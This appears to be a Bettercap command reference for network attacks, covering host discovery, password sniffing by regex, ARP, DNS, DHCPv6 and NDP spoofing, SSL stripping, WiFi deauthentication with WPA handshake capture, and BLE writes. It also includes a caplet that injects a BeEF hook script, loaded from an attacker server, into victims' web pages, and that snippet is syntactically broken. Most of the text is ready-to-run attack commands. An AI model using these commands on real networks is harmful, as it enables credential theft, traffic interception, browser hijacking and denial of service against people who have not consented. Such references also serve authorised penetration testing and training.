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Recon & Monitoring

show list of host details


turn passive host discovery on/off

net.recon on/off

The net.recon module performs passive scanning and is on by default, but it may not discover active devices that are not sending ARP messages while Bettercap is running. Bettercap also includes an active scanning feature in the net.probe module. Bettercap's net.probe module will continually send UDP packets to all hosts on the network. Bettercap sends the UDP activity in the form of four common protocols: NetBIOS Name Service (NBNS) discovery, Multicast DNS (MDNS), Universal Plug-and-Play (UPNP), and Web Services Discovery (WSD).

turn active host discovery on/off

net.probe on/off

Running the net.probe module for several seconds will typically reveal many more host discoveries than the net.recon module will discover. During the active discovery, or after stopping the discovery, you can examine information about discovered hosts using the net.show command.


turn packet sniffing on/off

net.sniff on/off

set verbose

set net.sniff.verbose true/false

If true it will consider packets from/to this computer, otherwise it will skip them.

set net.sniff.local true/false

save packets to a file

set net.sniff.output [filename]

examine packet sniffer status

net.sniff stats

add source pcap file to read

set net.sniff.source [filename]

extract matching regex from packet payloads

set net.sniff.regexp [regex]

set a protocol filter for sniffer output

set net.sniff.filter not arp
set net.sniff.filter dhcp

Password Sniffing

set net.sniff.local true
set net.sniff.regexp '.*password=.+'
set net.sniff.verbose 'true'
set net.sniff.output β€˜passwords.pcap’

You could use predefined caplet http-req-dump.cap:

# targeting the whole subnet by default, to make it selective:
# sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets"

# to make it less verbose
# events.stream off

# discover a few hosts 
net.probe on
sleep 1
net.probe off

# uncomment to enable sniffing too
set net.sniff.verbose false
set net.sniff.local true
set net.sniff.filter tcp port 443
net.sniff on

# we'll use this proxy script to dump requests
set https.proxy.script http-req-dump.js
set http.proxy.script http-req-dump.js

# go ^_^
http.proxy on
https.proxy on
arp.spoof on

Proxy JS Injection (XSS)

we use beef-xss active caplet

function onLoad() {
  log( "BeefInject loaded." );
  log("targets: " + env('arp.spoof.targets'));

function onResponse(req, res) {
  if( res.ContentType.indexOf('text/html') == 0 ){
    var body = res.ReadBody();
    if( body.indexOf('</head>') != -1 ) {
 log( "BeefInject loaded." );
log("targets: " + env('arp.spoof.targets'));
      res.Body = body.replace( 
        '<script type="text/javascript" src="http://<YOUR_SERVER>:3000/hook.js"></script></head>' 
bettercap -caplet beef-active.cap -eval "set arp.spoof.targets; arp.spoof on;" -debug

When user opens HTTP website, for instance time.com, hook will be executed

Bettercap + BeFF Hook


In addition to packet-sniffing capabilities, Bettercap also can mutate packets for network protocol fuzzing using the net.fuzz module. By default, the net.fuzz module will mutate 100% of packets transmitted by Bettercap, mutating 40% of the packet payload data. You can adjust these values by changing the net.fuzz.rate and net.fuzz.ratio parameters.

types of layers

mutate (fuzz) packets as they are forwarded

net.fuzz on/off

choose application layers are fuzzed

set net.fuzz.layer [layers]

change the percentage of packet and byte mutation


SYN Scan

start scan

set net.show.meta true
syn.scan [ip range] [start port] [end port]

stop scan

syn.scan stop

show progress


show results


Ticker Commands

The Bettercap ticker allows you to specify a collection of commands to run at a fixed frequency, which is great for monitoring the network or periodically scanning for new network targets.

ticker on/off
set ticker.commands "list; of; commands"

set ticker.period 10
set ticker.commands "clear; net.show; events.show 20 "

ARP Spoof

start ARP spoof

arp.spoof on/off

# Specify a list of target IP addresses, comma-separated
set arp.spoof.targets [IPs]

run ARP spoof in ban mode (targets connection wont work )

arp.ban on/off

run full duplex ARP spoof (both target and gateway will be attacked)

if the gateway has ARP spoof protection the attack will fail

set arp.spoof.fullduplex true/false 

# example:
# Ban the address from the network:
set arp.spoof.targets; arp.ban on

# Spoof, and
set arp.spoof.targets; arp.spoof on

Ban Target From Network

set arp.spoof.targets <TARGET_IP>
arp.ban on

DNS Spoof

Set the dns.spoof.address for the host that you want to receive client activity stemming from spoofed responses. Set dns.spoof.domains to a comma-separated list of all the domains you want to target for DNS spoofing, or set dns.spoof.all to true to spoof all DNS responses. Alternatively, you can target your attack by setting dns.spoof.hosts to a hosts file that uses a specific hostname-to-IP-address pairing (using the same configuration of the standard /etc/hosts file on UNIX systems).

dns.spoof on/off

Set the IP address to return for spoofed DNS answers

set dns.spoof.address [address]

Set a list of domain targets for DNS spoofing, comma- separated list

set dns.spoof.domains [domain]

Perform DNS spoofing for all requests regardless of domain, hosts file

set dns.spoof.all true/false

Perform DNS spoofing only for the entries mapped in the specified hosts file

set dns.spoof.hosts [hostsfile]

DHCPv6 Spoof

dhcp6.spoof on/off

NDP Spoof

ndp.spoof on/off

Custom Proxy

turn any proxy on/off

any.proxy on/off

# set interface for redirection
set any.proxy.iface <interface name>

# set protocol
set any.proxy.protocol TCP/UDP

# set port
set any.proxy.src_port 80

# set source address
set any.proxy.src_address [ip]

# set dest address
set any.proxy.dst_address [ip]	

# set dst port
set any.proxy.dst_port	[port]

TCP Proxy

tcp.proxy on/off

HTTP Proxy

http.proxy on/off

enable SSL strip attack

set http.proxy.sslstrip true/false

URL, path or js code to inject into every HTML page

set http.proxy.script /root/Desktop/Hook.js

# example:
# Will ARP spoof the whole network,
# enable sslstrip and inject a 
# β€œHello World” javascript alert 
# to every HTML page being visited:

set http.proxy.injectjs alert("Hello World")
set http.proxy.sslstrip true

http.proxy on
arp.spoof on


A full featured HTTPS transparent proxy that can be scripted using javascript modules. If used together with a spoofer, all HTTPS traffic will be redirected to it and it will automatically handle port redirections as needed.

When a new TLS connection is being proxied, bettercap will fetch the original certificate from the target host and resign on the fly the full chain using its own CA.

https.proxy on/off

enable SSL strip attack

set https.proxy.sslstrip true/false

inject js code

set https.proxy.script /root/Desktop/Hook.js

Wifi Network Monitoring

wifi.recon covers both 2.4 Ghz and 5Ghz frequencies. It’s doing everything you need. Deauth, Sniff, Handshake captures. To start, add -iface option:

 bettercap -iface wlan0

In case of an error: Can’t restore interface wlan0 wireless mode (SIOCSIWMODE failed: Bad file descriptor). Please adjust manually. Quit bettercap and manually set the wireless interface to monitor mode. For example, as follows:

$ sudo ip link set wlan0 down
$ sudo iw wlan0 set monitor control
$ sudo ip link set wlan0 up

Turn on recon:

wifi.recon on

You can manage channels with:

wifi.recon.channel 10,11

To clear them:

wifi.recon.channel clear

Results can be seen with:


To capture handshakes, we should define a sniffer, filter specific frames (0x888e), set the output file for processing later on, maybe select the channel and or target:

Β» set net.sniff.verbose true
Β» set net.sniff.filter ether proto 0x888e
Β» set net.sniff.output /root/wpa.pcap
Β» net.sniff on

Β» wifi.recon.channel 1
Β» wifi.recon on
Β» wifi.recon 94:33:30:a6:2b:63

Then we should hit it with the Deauth. You can deauth all clients with:

wifi.deauth AP-BSSID

or just specific one:

wifi.deauth CLIENT-BSSID

When you capture the handshake, you can start breaking them. We’ll not cover that here.

BLE (Bluetooth Low Energy device discovery)

The ble.recon will discovery every BLE device you want to inspect with ble.enum or playaround with ble.write.

To connect, enumerate and read characteristics from the BLE device 04:ff:de:ff:be:ff:

ble.enum 04:ff:de:ff:be:ff

Write the bytes ff ff ff ff ff ff ff ff to the BLE device 04:ff:de:ff:be:ff on its characteristics with UUID 234afbd5e3b34536a3fe72f630d4278d:

 ble.write 04:ff:de:ff:be:ff 234afbd5e3b34536a3fe72f630d4278d ffffffffffffffff

ble.enum only works one time per execution

incomplete support for macOS

not supported on Windows

Last updated